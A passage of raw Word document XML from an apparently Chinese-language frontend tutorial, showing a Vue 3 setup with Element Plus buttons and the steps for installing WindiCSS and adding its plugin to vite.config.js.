        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import ElementPlus from 'element-plus'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E13F8" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import 'element-plus/dist/index.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460D49B" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import App from './App.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C90B0A" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B9321C" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C42DD9" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>const app = createApp(App)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FA7DC" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21778E72" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>app.use(ElementPlus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D62548" w14:textId="02A077FF" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>app.mount('#app')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0DF343" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DBCFC0" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB52E81" w14:textId="138791B8" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>pp.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B1402" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B3225" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// import HelloWorld from './components/HelloWorld.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F8FBB" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// import TheWelcome from './components/TheWelcome.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709E50E" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A52820" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08010588" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3DE4D6" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380A296" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;el-row class="mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA1ADA" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button&gt;Default&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814E62C" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button type="primary"&gt;Primary&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF230B" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button type="success"&gt;Success&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980168B" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button type="info"&gt;Info&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED9927" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button type="warning"&gt;Warning&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73195205" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;el-button type="danger"&gt;Danger&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C7664" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/el-row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35069573" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A01C51" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B2A78" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5748E54E" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;style scoped&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF0C6C" w14:textId="2291C584" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3270A43D" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFFDED6" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478CB08C" w14:textId="4023A69D" w:rsidR="00C67EAA" w:rsidRDefault="00CA109C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地样式如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F6CDF" w14:textId="766B4995" w:rsidR="00C67EAA" w:rsidRDefault="00CA109C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF2D60A" wp14:editId="3E85E073">
            <wp:extent cx="5274310" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1829841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41300" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2159635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BBCB36" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C961D76" w14:textId="6438EE47" w:rsidR="00C67EAA" w:rsidRDefault="00565C29" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="683" w:name="_Toc159780113"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具库和配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="683"/>
    </w:p>
    <w:p w14:paraId="4A1ECB9A" w14:textId="309C9B7E" w:rsidR="00C67EAA" w:rsidRDefault="00565C29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windicss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidRPr="00E86BDB">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://cn.windicss.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37208DB5" w14:textId="77777777" w:rsidR="00565C29" w:rsidRDefault="00565C29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D32113" w14:textId="74AFAEEB" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593E72D" w14:textId="028581BF" w:rsidR="00565C29" w:rsidRPr="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm i -D vite-plugin-windicss windicss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E221BD3" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC0E41E" w14:textId="2F8C42AE" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置中添加插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40FBCE" w14:textId="022D7D0E" w:rsidR="00C67EAA" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r>
        <w:t>.config.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D60A2CB" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A14D2E8" w14:textId="34265975" w:rsidR="00C67EAA" w:rsidRPr="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">mport WindiCSS from </w:t>
      </w:r>
      <w:r w:rsidR="00B715D8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vite-plugin-windicss</w:t>
      </w:r>
      <w:r w:rsidR="00B715D8">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208BA919" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C92763" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>xport default{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096C9C4" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>plugins:[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B2E4C" w14:textId="10FA32EE" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>WindiCSS(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD48125" w14:textId="03C721E0" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1AC8B9" w14:textId="44F8EE23" w:rsidR="00A51BCE" w:rsidRPr="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217FDA1B" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3EDAC4" w14:textId="675E09B0" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际添加大致如下即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E20826" w14:textId="77777777" w:rsidR="00BB5A3E" w:rsidRDefault="00BB5A3E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E712550" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { fileURLToPath, URL } from 'node:url'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B14820" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D28DA33" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { defineConfig } from 'vite'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0347C9EC" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import vue from '@vitejs/plugin-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741A0BB8" w14:textId="25D19A67" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">import WindiCSS from </w:t>
      </w:r>
      <w:r w:rsidR="00B715D8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vite-plugin-windicss</w:t>
      </w:r>
      <w:r w:rsidR="00B715D8">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26407966" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127E09A9" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// https://vitejs.dev/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08455670" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default defineConfig({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711C972" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  plugins: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A148C" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    vue(),</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51BCE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WindiCSS()</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A31B8B" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6497C9" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  resolve: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FD042" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    alias: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318576CD" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      '@': fileURLToPath(new URL('./src', import.meta.url))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B7601" w14:textId="77777777" w:rsidR="00A51BCE" w:rsidRDefault="00A51BCE" w:rsidP="009222EB">
      <w:pPr>
